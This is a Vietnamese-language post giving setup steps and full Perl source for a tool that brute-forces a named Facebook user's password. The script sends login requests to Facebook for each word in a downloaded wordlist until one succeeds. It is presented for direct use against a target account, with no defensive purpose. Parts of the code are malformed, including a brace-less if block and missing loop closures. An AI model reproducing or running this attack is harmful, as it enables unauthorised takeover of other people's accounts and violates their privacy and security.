# Imad’Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
Code được viết ngôn ngữ Perl dùng để crack password Facebook theo từ điển password có sẵn. Sử dụng lệnh dưới đây để crack
Chuẩn bị
- Cài active perl trên windows, hoặc sử dụng Koding (http://koding.com)
- Save code với tên file Bruter.pl
- Tải worldlist về (file chứa các mật khẩu thường) lưu về thành password.txt >>Download<<
- Sử dụng lệnh dưới đây để crack
Facebooklogin@facebook.com: là email facebook muốn crack
password.txt: là file chứa từ điển password (có thể download trên mạng rất nhiều). Từ khóa: worldlist password txt.
# Tool: Imad'Ox Bruter
# Author: Imad'Ox Hunter
# Contact: imadelouajib@gmail.com
# Code date: 17 April 2013
# Description:
# Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
# Usage:
# perl Imad'Ox-Bruter.pl login wordlist
# login could be either a user's email address or profile name
# Module Requirements:
# Install module if missing:
# perl -MCPAN -e 'install Net::SSLeay'
# Demo:
# perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst
# --- Imad'Ox-Bruter Facebook password cracking tool
# --- By Imad'Ox Hunter
# --- www.facebook.com/imad.elouajib
# [+] Cracking Facebooklogin@facebook.com ...
# [-] test -> Failed
# [-] test123 -> Failed
# [-] testtest -> Failed
# [-] testest123 -> Failed
# [-] qwerty -> Failed
# [-] azerty -> Failed
# [-] password -> Failed
# [-] password123 -> Failed
# [+] CRACKED! Your password is P@$$W0RD
use strict;
use Net::SSLeay::Handle;
if(!defined($ARGV[0] && $ARGV[1])) {
print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
print "+++ Coded by Imad'Ox-Hunter\n";
print "+++ www.fb.com/imad.elouajib\n\n";
print "+++ Usage: perl $0 login wordlist\n\n";
exit; }
my $user = $ARGV[0];
my $wordlist = $ARGV[1];
open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";
print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
print "+++ Coded by Imad'Ox-Hunter\n";
print "+++ www.fb.com/imad.elouajib\n";
print "\n[+] Now Cracking $user ...\n\n";
while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
my $a = "POST /login.php HTTP/1.1";
my $b = "Host: www.facebook.com";
my $c = "Connection: close";
my $e = "Cache-Control: max-age=0";
my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
my $g = "Origin: https://www.facebook.com";
my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
my $i = "Content-Type: application/x-www-form-urlencoded";
my $j = "Accept-Encoding: gzip,deflate,sdch";
my $k = "Accept-Language: en-US,en;q=0.8";
my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
my $cl = length($post);
my $d = "Content-Length: $cl";
my ($host, $port) = ("www.facebook.com", 443);
tie(*SSL, "Net::SSLeay::Handle", $host, $port);
print SSL "$a\n";
print SSL "$b\n";
print SSL "$c\n";
print SSL "$d\n";
print SSL "$e\n";
print SSL "$f\n";
print SSL "$g\n";
print SSL "$h\n";
print SSL "$i\n";
print SSL "$j\n";
print SSL "$k\n";
print SSL "$l\n";
print SSL "$cookie\n\n";
print SSL "$post\n";
my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
if (!defined $success)
print "[-] $password -> Not Him :( \n";
close SSL;
print "\n########################################################\n";
print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
print "########################################################\n\n";
close SSL;
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